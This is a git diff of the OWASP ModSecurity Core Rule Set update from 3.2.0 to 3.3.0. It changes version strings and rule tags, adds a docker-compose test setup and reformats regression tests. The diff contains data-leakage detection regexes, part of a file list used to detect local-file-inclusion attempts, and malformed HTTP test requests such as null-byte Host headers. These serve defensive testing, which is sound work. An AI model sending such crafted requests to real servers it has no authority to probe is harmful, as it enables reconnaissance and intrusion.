ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -36,12 +36,9 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_PHP',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -65,12 +62,9 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -98,12 +92,9 @@ SecRule RESPONSE_BODY "@rx <\?(?!xml)" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ chain" SecRule RESPONSE_BODY "!@rx (?:\x1f\x8b\x08|\b(?:(?:i(?:nterplay|hdr|d3)|m(?:ovi|thd)|r(?:ar!|iff)|(?:ex|jf)if|f(?:lv|ws)|varg|cws)\b|gif)|B(?:%pdf|\.ra)\b|^wOF[F2])" \ diff --git a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf index a38f79f36..c62fc0cbc 100644 --- a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf +++ b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -35,7 +35,7 @@ SecRule RESPONSE_BODY "@rx [a-z]:\\\\inetpub\b" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -54,11 +54,9 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:<\/font tag:'platform-windows',\ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -81,12 +79,9 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" @@ -107,12 +102,9 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \ tag:'attack-disclosure',\ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ - tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',\ - tag:'WASCTC/WASC-13',\ - tag:'OWASP_TOP_10/A6',\ tag:'PCI/6.5.6',\ ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ERROR',\ chain" SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \ diff --git a/rules/RESPONSE-959-BLOCKING-EVALUATION.conf b/rules/RESPONSE-959-BLOCKING-EVALUATION.conf index 1e5358b01..8f8114cfc 100644 --- a/rules/RESPONSE-959-BLOCKING-EVALUATION.conf +++ b/rules/RESPONSE-959-BLOCKING-EVALUATION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -72,7 +72,7 @@ SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \ t:none,\ msg:'Outbound Anomaly Score Exceeded (Total Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.anomaly_score=+%{tx.outbound_anomaly_score}'" diff --git a/rules/RESPONSE-980-CORRELATION.conf b/rules/RESPONSE-980-CORRELATION.conf index 2b6807c8e..75538f369 100644 --- a/rules/RESPONSE-980-CORRELATION.conf +++ b/rules/RESPONSE-980-CORRELATION.conf @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 @@ -29,7 +29,7 @@ SecRule &TX:'/LEAKAGE\\\/ERRORS/' "@ge 1" \ log,\ msg:'Correlated Successful Attack Identified: (Total Score: %{tx.anomaly_score}) Inbound Attack (Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Data Leakage (Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'EMERGENCY',\ chain,\ skipAfter:END-CORRELATION" @@ -46,7 +46,7 @@ SecRule &TX:'/AVAILABILITY\\\/APP_NOT_AVAIL/' "@ge 1" \ log,\ msg:'Correlated Attack Attempt Identified: (Total Score: %{tx.anomaly_score}) Inbound Attack (Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Application Error (Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ severity:'ALERT',\ chain,\ skipAfter:END-CORRELATION" @@ -60,7 +60,7 @@ SecAction \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.executing_anomaly_score=%{tx.anomaly_score_pl1}',\ setvar:'tx.executing_anomaly_score=+%{tx.anomaly_score_pl2}',\ setvar:'tx.executing_anomaly_score=+%{tx.anomaly_score_pl3}',\ @@ -75,7 +75,7 @@ SecRule TX:INBOUND_ANOMALY_SCORE "@lt %{tx.inbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Inbound Anomaly Score (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE} - SQLI=%{tx.sql_injection_score},XSS=%{tx.xss_score},RFI=%{tx.rfi_score},LFI=%{tx.lfi_score},RCE=%{tx.rce_score},PHPI=%{tx.php_injection_score},HTTP=%{tx.http_violation_score},SESS=%{tx.session_fixation_score}): individual paranoia level scores: %{TX.ANOMALY_SCORE_PL1}, %{TX.ANOMALY_SCORE_PL2}, %{TX.ANOMALY_SCORE_PL3}, %{TX.ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule TX:MONITOR_ANOMALY_SCORE "@gt 1" @@ -88,7 +88,7 @@ SecRule TX:INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Inbound Anomaly Score Exceeded (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE} - SQLI=%{tx.sql_injection_score},XSS=%{tx.xss_score},RFI=%{tx.rfi_score},LFI=%{tx.lfi_score},RCE=%{tx.rce_score},PHPI=%{tx.php_injection_score},HTTP=%{tx.http_violation_score},SESS=%{tx.session_fixation_score}): individual paranoia level scores: %{TX.ANOMALY_SCORE_PL1}, %{TX.ANOMALY_SCORE_PL2}, %{TX.ANOMALY_SCORE_PL3}, %{TX.ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \ "id:980140,\ @@ -99,7 +99,7 @@ SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Outbound Anomaly Score Exceeded (score %{TX.OUTBOUND_ANOMALY_SCORE}): individual paranoia level scores: %{TX.OUTBOUND_ANOMALY_SCORE_PL1}, %{TX.OUTBOUND_ANOMALY_SCORE_PL2}, %{TX.OUTBOUND_ANOMALY_SCORE_PL3}, %{TX.OUTBOUND_ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Creating a total sum of all triggered outbound rules, including the ones only being monitored SecAction \ @@ -109,7 +109,7 @@ SecAction \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.executing_anomaly_score=%{tx.outbound_anomaly_score_pl1}',\ setvar:'tx.executing_anomaly_score=+%{tx.outbound_anomaly_score_pl2}',\ setvar:'tx.executing_anomaly_score=+%{tx.outbound_anomaly_score_pl3}',\ @@ -124,7 +124,7 @@ SecRule TX:OUTBOUND_ANOMALY_SCORE "@lt %{tx.outbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Outbound Anomaly Score (Total Outbound Score: %{TX.OUTBOUND_ANOMALY_SCORE}): individual paranoia level scores: %{TX.OUTBOUND_ANOMALY_SCORE_PL1}, %{TX.OUTBOUND_ANOMALY_SCORE_PL2}, %{TX.OUTBOUND_ANOMALY_SCORE_PL3}, %{TX.OUTBOUND_ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule TX:MONITOR_ANOMALY_SCORE "@gt 1" diff --git a/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example b/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example index 89c90420e..7682fc093 100644 --- a/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +++ b/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 diff --git a/rules/lfi-os-files.data b/rules/lfi-os-files.data index 956d6e1ae..b32464f2c 100644 --- a/rules/lfi-os-files.data +++ b/rules/lfi-os-files.data @@ -1112,4 +1112,4 @@ npm-debug.log ormconfig.json tsconfig.json webpack.config.js -yarn.lock \ No newline at end of file +yarn.lock diff --git a/tests/docker-compose.yml b/tests/docker-compose.yml new file mode 100644 index 000000000..006adf6d1 --- /dev/null +++ b/tests/docker-compose.yml @@ -0,0 +1,41 @@ +version: '3.1' + +# Only one of these will be up at a time for now. +# Concurrency will be on the tests folder we have. + +services: + modsec2-apache: + image: owasp/modsecurity-crs:v3.2-modsec2-apache + environment: + - SERVERNAME=modsec2-apache + - MODSEC_RULE_ENGINE=DetectionOnly + - PARANOIA=5 + volumes: + - ${GITHUB_WORKSPACE}/logs/modsec2-apache:/var/log/apache2 + - ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules + ports: + - "80:80" + + modsec3-apache: + image: owasp/modsecurity-crs:v3.2-modsec3-apache + environment: + - SERVERNAME=modsec3-apache + - MODSEC_RULE_ENGINE=DetectionOnly + - PARANOIA=5 + volumes: + - ${GITHUB_WORKSPACE}/logs/modsec3-apache:/var/log/apache2 + - ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules + ports: + - "80:80" + + modsec3-nginx: + image: owasp/modsecurity-crs:v3.2-modsec3-nginx + environment: + - SERVERNAME=modsec3-nginx + - MODSEC_RULE_ENGINE=DetectionOnly + - PARANOIA=5 + volumes: + - ${GITHUB_WORKSPACE}/logs/modsec3-nginx:/var/log/nginx + - ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules + ports: + - "80:80" diff --git a/tests/regression/config.ini b/tests/regression/config.ini index b62248a91..fd64353b0 100644 --- a/tests/regression/config.ini +++ b/tests/regression/config.ini @@ -1,14 +1,14 @@ -[2.9-apache] +[modsec2-apache] log_date_format = %a %b %d %H:%M:%S.%f %Y log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\] log_location_linux = /var/log/apache2/error.log -[3.0-apache] +[modsec3-apache] log_date_format = %a %b %d %H:%M:%S.%f %Y log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\] log_location_linux = /var/log/apache2/error.log -[3.0-nginx] +[modsec3-nginx] log_date_format = %Y/%m/%d %H:%M:%S log_date_regex = (\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2}) log_location_linux = /var/log/nginx/error.log diff --git a/tests/regression/conftest.py b/tests/regression/conftest.py index b1442cc32..c2e2cd975 100644 --- a/tests/regression/conftest.py +++ b/tests/regression/conftest.py @@ -7,7 +7,7 @@ def pytest_addoption(parser): - parser.addoption('--config', action='store', default='2.9-apache') + parser.addoption('--config', action='store', default='modsec2-apache') @pytest.fixture(scope='session') diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 8c09dabd6..d19e564f2 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -150,7 +150,7 @@ uri: "/index.html:80?I=Like&Apples=Today#tag" version: "HTTP/1.1" output: - status: [400,403] + status: [400, 403] - # Normal Options request with path test_title: 920100-9 @@ -205,7 +205,7 @@ uri: "\\" version: "HTTP/1.1" output: - status: [403,400] + status: [403, 400] #log_contains: "id \"920100\"" - test_title: 920100-12 @@ -246,8 +246,8 @@ uri: \index.html version: HTTP\1.0 output: - status: [403,400] - #log_contains: id "920100" + status: [403, 400] + # log_contains: id "920100" - test_title: 920100-14 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions @@ -283,5 +283,5 @@ User-Agent: ModSecurity CRS 3 Tests Host: localhost output: - status: [403,400] - #log_contains: id "920100" + status: [403, 400] + # log_contains: id "920100" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index 688687a70..939ca28e7 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml @@ -86,8 +86,8 @@ version: HTTP/1.0 data: abc output: - status: 200 - no_log_contains: id "920160" + status: 200 + no_log_contains: id "920160" - test_title: 920160-5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions @@ -112,5 +112,5 @@ version: HTTP/1.0 data: abc output: - status: [200,403,400] - #log_contains: id "920160" + status: [200, 403, 400] + # log_contains: id "920160" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index fc688fd8a..08ef275fc 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml @@ -23,7 +23,7 @@ stop_magic: true uri: "/" output: - status: [200, 411] + log_contains: id "920180" - test_title: 920180-2 stages: diff --git a/util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml similarity index 100% rename from util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml rename to tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml index e562e3d45..5ef13f211 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml @@ -122,4 +122,4 @@ uri: / version: HTTP/1.1 output: - log_contains: id "920210" \ No newline at end of file + log_contains: id "920210" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index e216e6b6f..efb9675c6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml @@ -79,4 +79,4 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - log_contains: "id \"920220\"" \ No newline at end of file + log_contains: "id \"920220\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml index 54a5c59d2..da55b3368 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml @@ -53,4 +53,4 @@ Keep-Alive: "300" Proxy-Connection: "keep-alive" output: - log_contains: "id \"920260\"" \ No newline at end of file + log_contains: "id \"920260\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index 28d4bb336..b4f95d46c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -62,8 +62,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost%00" output: - status: [403,400] - #log_contains: "id \"920270\"" + status: [403, 400] + # log_contains: "id \"920270\"" - test_title: 920270-5 stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index 6e186693f..1b1ea6b52 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml @@ -89,4 +89,4 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - no_log_contains: "id \"920271\"" \ No newline at end of file + no_log_contains: "id \"920271\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index a8503d429..05b2f8344 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml @@ -76,4 +76,4 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - log_contains: "id \"920273\"" \ No newline at end of file + log_contains: "id \"920273\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml index a75a18875..c7bd0bbc0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml @@ -22,8 +22,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost%1F" output: - status: [200,403,400] - #log_contains: "id \"920274\"" + status: [200, 403, 400] + # log_contains: "id \"920274\"" - test_title: 920274-2 stages: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml index 03e015a03..2cbb250b2 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml @@ -22,29 +22,30 @@ output: status: [403, 400] #log_contains: "id \"920290\"" - #- - #test_title: 920290-2 - #stages: - # - - # stage: - # input: - # dest_addr: "127.0.0.1" - # port: 80 - # headers: - # User-Agent: "ModSecurity CRS 3 Tests" - # Host: "%00" - # output: - # no_log_contains: "id \"920290\"" - # - - # test_title: 920290-3 - # stages: - # - - # stage: - # input: - # dest_addr: "127.0.0.1" - # port: 80 - # headers: - # User-Agent: "ModSecurity CRS 3 Tests" - # Host: "localhost" - # output: - # no_log_contains: "id \"920290\"" + +#- +#test_title: 920290-2 +#stages: +# - +# stage: +# input: +# dest_addr: "127.0.0.1" +# port: 80 +# headers: +# User-Agent: "ModSecurity CRS 3 Tests" +# Host: "%00" +# output: +# no_log_contains: "id \"920290\"" +# - +# test_title: 920290-3 +# stages: +# - +# stage: +# input: +# dest_addr: "127.0.0.1" +# port: 80 +# headers: +# User-Agent: "ModSecurity CRS 3 Tests" +# Host: "localhost" +# output: +# no_log_contains: "id \"920290\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml index d3e8c6b2c..d77950173 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml @@ -46,4 +46,3 @@ Accept: "text/plain, text/html" output: no_log_contains: "id \"920311\"" - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml index a6baf9e74..a7657807a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml @@ -30,4 +30,3 @@ Host: "localhost" output: no_log_contains: "id \"920320\"" - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml index 220fd3fa8..e52204abb 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml @@ -31,4 +31,3 @@ Host: "localhost" output: no_log_contains: "id \"920330\"" - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml index 54cc46fcb..aaa7fdb1e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml @@ -36,5 +36,3 @@ stop_magic: true output: expect_error: true - - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml index bcb2563da..ec8112b46 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920420.yaml @@ -250,5 +250,3 @@ data: "test" output: log_contains: "id \"920420\"" - - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml index e62ab55f5..8d0b64e04 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml @@ -46,8 +46,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - status: [403,400] - #log_contains: "id \"920430\"" + status: [403, 400] + # log_contains: "id \"920430\"" - test_title: 920430-4 stages: @@ -92,8 +92,8 @@ User-Agent: "ModSecurity CRS 3 Tests #FN" Host: "localhost" output: - status: [403,400] - #log_contains: "id \"920430\"" + status: [403, 400] + # log_contains: "id \"920430\"" - test_title: 920430-7 stages: @@ -107,8 +107,8 @@ User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" output: - status: [403,400] - #log_contains: "id \"920430\"" + status: [403, 400] + # log_contains: "id \"920430\"" - test_title: 920430-8 @@ -181,4 +181,4 @@ version: JUNK/1.0 output: status: [403, 400] - #log_contains: id "920430" + # log_contains: id "920430" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml index e0e667f5b..6a696caaa 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920450.yaml @@ -110,5 +110,3 @@ Range: "test" output: no_log_contains: "id \"920450\"" - - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml index e1ed055e1..43be0c505 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920470.yaml @@ -197,4 +197,3 @@ Content-Length: 0 output: no_log_contains: "id \"920470\"" - diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 6c23dc1df..aaf5aaf62 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -158,7 +158,8 @@ headers: User-Agent: "ModSecurity CRS 3 Tests" Host: "localhost" - Content-Type: "application/x-www-form-urlencoded;charset=ibm038" # random other IBM charset + # random other IBM charset + Content-Type: "application/x-www-form-urlencoded;charset=ibm038" data: "test=value" output: log_contains: "id \"920480\"" @@ -202,7 +203,8 @@ headers: 